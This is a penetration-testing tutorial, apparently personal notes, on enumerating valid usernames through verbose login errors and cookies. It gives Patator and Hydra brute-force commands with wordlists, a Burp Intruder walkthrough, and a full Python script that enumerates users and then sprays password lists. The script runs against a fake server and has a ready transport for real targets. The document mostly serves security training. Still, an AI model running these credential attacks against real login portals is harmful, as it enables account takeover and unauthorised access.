Username Enumeration

Username Fuzzing (Patator):

# list the available modules
patator
# help for the http_fuzz module
patator http_fuzz -h
# Same attack as Burp example 1 below, done with patator: FILE0 is the username list, the password is a throwaway, and -x ignore:fgrep drops every response that contains the failure string, so only names that did not get "Invalid Username" are reported
patator http_fuzz url=http://some.site/login.php method=POST body='username=FILE0&password=1234' 0=/root/Desktop/usernames.txt follow=1 accept_cookie=1 -x ignore:fgrep='Invalid Username'

Hydra Method:

If a login portal returns overly verbose errors, we can use it to enumerate valid usernames. In this case we see the "invalid user" message, which tells us the name does not exist (a known user with a bad password gets a different message).

From here we pass the request through Burp to see the full request and response, so we can craft the hydra brute force.

Note how in the request, line 1 is a GET passing the login data in the query string, and line 2 is the Host header, the host the request is being sent to.

Then in the response we can see the same form error message we saw earlier in the browser.

At this point we can use the following command, which in order: passes the username list (-L), uses a single throwaway password (-p), sets 10 parallel tasks (-t 10), names the target host, selects the module (http-get-form, because the login is a GET whose form is returned in the response), then in quotes gives the module string: the path, the parameters with ^USER^ and ^PASS^ as the injection points, and the failure string to match ("invalid user"). Lastly -o writes the hits to a file and -V prints every attempt so we can check it is working.

For HTTP Basic Auth use the http-get module instead of http-get-form.

hydra -L /usr/share/seclists/Usernames/Names/names.txt -p asdfasdf -t 10 1.lab.auth.site http-get-form "/ajax.php:fun=login&username=^USER^&password=^PASS^:invalid user" -o found.txt -V

While it runs we see a hit: a name whose response did not contain the "invalid user" string.

Once you have a list of valid users, repeat the cycle with that user list (-L) and a password list (-P), this time matching on the bad-password message.

An example password attack may look like the following:

hydra -L myusers.txt -P password.txt -t 10 -o result-attack.txt <TARGET> http-get-form "/ajax.php:fun=login&username=^USER^&password=^PASS^:invalid password"

Burp Method:

Spotting a portal to exploit

From Intercept:

In the HTTP history tab, right-click the login request and send it to Intruder. Then in the Positions tab mark the field(s) we want to enumerate on, here the username parameter.

Then, using the "Simple list" payload type, load the username wordlist into Burp:

Then in the Options tab, go to Grep - Match, clear the current list and add the string you want it to look for (here "invalid").

Then in the Redirections section of the Options tab, pick the behaviour you need. If you are not sure, choose "In-scope only".

Now we can start the attack. Then sort the tested names by the "invalid" column (the grep match flag): entries without the flag did not get the error message, so the top 3 here are valid usernames:

Example 2 (username enumeration via cookies): here no error is printed in the page HTML, but the response sets a "wrong_user" cookie. We can use this cookie to validate users. Response for an unknown user:

versus a known user with a bad password:

In Intruder we mark the username value in the request as the position to fuzz:

Then we load the username wordlist as a Simple list payload:

In the Grep - Match section add the string ("wrong_user") and untick "Exclude HTTP headers", so the Set-Cookie header of the response is searched as well:

Then in the Redirections section of the Options tab, pick the behaviour you need. If you are not sure, choose "In-scope only".

Then start the attack and sort by the grep flag to see the results: names without the wrong_user flag are valid users.
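The whole workflow above, as an added Python example (not code from the original page, nor from Hydra, Patator or Burp): stage 1 enumerates usernames, stage 2 sprays a password list at the confirmed users, and the classifier supports both oracles seen on this page, the failure string in the body from the Hydra section / Burp example 1 and the cookie that is only set on failure from Burp example 2. The /ajax.php?fun=login form and the strings "invalid user", "invalid password" and "wrong_user" come from the page; the account names, passwords and the fake server that answers for them are constructed here so the script runs offline, and http_send() is the real transport to point at a target you are authorised to test.

```python
"""Username enumeration + password attack against a verbose login, in the shape
of the Hydra/Burp workflow above. Two failure oracles: a body string ("invalid
user") or a cookie set only on failure ("wrong_user"). The transport is a
callable, so the same logic runs against the fake server below or a real target."""
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List

@dataclass
class Response:
    status: int
    headers: Dict[str, List[str]]  # name -> every value sent (Set-Cookie repeats)
    body: str

@dataclass
class Oracle:
    """How a FAILED attempt shows up; an empty string means 'do not check this'."""
    body_text: str = ""    # Burp "Grep - Match" string / Hydra failure string
    cookie_name: str = ""  # Burp example 2: a cookie only present on failure

Send = Callable[[str], Response]

def login_path(username: str, password: str) -> str:
    """The GET form Hydra targets: /ajax.php?fun=login&username=^USER^&password=^PASS^"""
    return "/ajax.php?" + urllib.parse.urlencode(
        {"fun": "login", "username": username, "password": password})

def failed(resp: Response, oracle: Oracle) -> bool:
    """True when the response carries the failure signal the oracle describes."""
    if oracle.body_text and oracle.body_text.lower() in resp.body.lower():
        return True
    if oracle.cookie_name:  # look in Set-Cookie, which a body-only grep never sees
        for raw in resp.headers.get("Set-Cookie", []):
            if raw.split("=", 1)[0].strip() == oracle.cookie_name:
                return True
    return False

def enumerate_users(candidates: Iterable[str], send: Send, oracle: Oracle,
                    junk_password: str = "asdfasdf") -> List[str]:
    """Stage 1: throwaway password per name; keep names WITHOUT the unknown-user
    signal. Lockout pages or WAF blocks land here too, so eyeball the hits."""
    return [u for u in candidates if not failed(send(login_path(u, junk_password)), oracle)]

def spray_passwords(users: Iterable[str], passwords: Iterable[str],
                    send: Send, oracle: Oracle) -> Dict[str, str]:
    """Stage 2: the password list against each confirmed user, stop at the first hit."""
    found: Dict[str, str] = {}
    pw_list = list(passwords)
    for u in users:
        for p in pw_list:
            if not failed(send(login_path(u, p)), oracle):
                found[u] = p
                break
    return found

# ---- Constructed stand-in for the target; accounts and messages are made up ----
FAKE_ACCOUNTS = {"admin": "Winter2024!", "jsmith": "letmein", "svc_backup": "backup"}

def make_fake_server(verbose_body: bool) -> Send:
    """True: error text in the HTML (Hydra / Burp example 1).
    False: generic text, only the cookie differs (Burp example 2)."""
    def send(path: str) -> Response:
        qs = urllib.parse.parse_qs(urllib.parse.urlsplit(path).query)
        user, pw = qs.get("username", [""])[0], qs.get("password", [""])[0]
        if user not in FAKE_ACCOUNTS:
            msg, cookie = "invalid user", "wrong_user=1; Path=/"
        elif FAKE_ACCOUNTS[user] != pw:
            msg, cookie = "invalid password", "wrong_pass=1; Path=/"
        else:
            return Response(200, {"Set-Cookie": ["PHPSESSID=2b3c4d; Path=/; HttpOnly"]}, "welcome")
        return Response(200, {"Set-Cookie": [cookie]}, msg if verbose_body else "login failed")
    return send

def http_send(base_url: str) -> Send:
    """Real transport: GET base_url+path WITHOUT following redirects, so a 302
    issued only for valid users stays visible as a difference."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # surfaces the 3xx as an HTTPError instead of following it
    opener = urllib.request.build_opener(NoRedirect)
    def send(path: str) -> Response:
        try:
            r = opener.open(base_url.rstrip("/") + path, timeout=10)
        except urllib.error.HTTPError as e:  # 3xx/4xx/5xx still carry headers and body
            r = e
        hdrs: Dict[str, List[str]] = {}
        for k, v in r.headers.items():
            hdrs.setdefault(k, []).append(v)
        return Response(r.getcode(), hdrs, r.read().decode("utf-8", "replace"))
    return send

if __name__ == "__main__":
    names = ["root", "admin", "guest", "jsmith", "svc_backup", "test"]
    srv = make_fake_server(verbose_body=True)
    users = enumerate_users(names, srv, Oracle(body_text="invalid user"))
    print("valid users:", users)
    print("credentials:", spray_passwords(users, ["password", "letmein", "Winter2024!"], srv,
                                          Oracle(body_text="invalid password")))
    print("via cookie:", enumerate_users(names, make_fake_server(False), Oracle(cookie_name="wrong_user")))
```

Against the quiet variant of the fake server, an Oracle that only greps the body never sees a failure and reports every candidate as valid, which is the false-positive Burp example 2 avoids by unticking "Exclude HTTP headers"; the cookie oracle gets the same three names as the verbose case. For a real run, replace the fake server with http_send("http://1.lab.auth.site") and keep the redirect behaviour in mind, since a 302 served only to valid users is itself a usable oracle.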
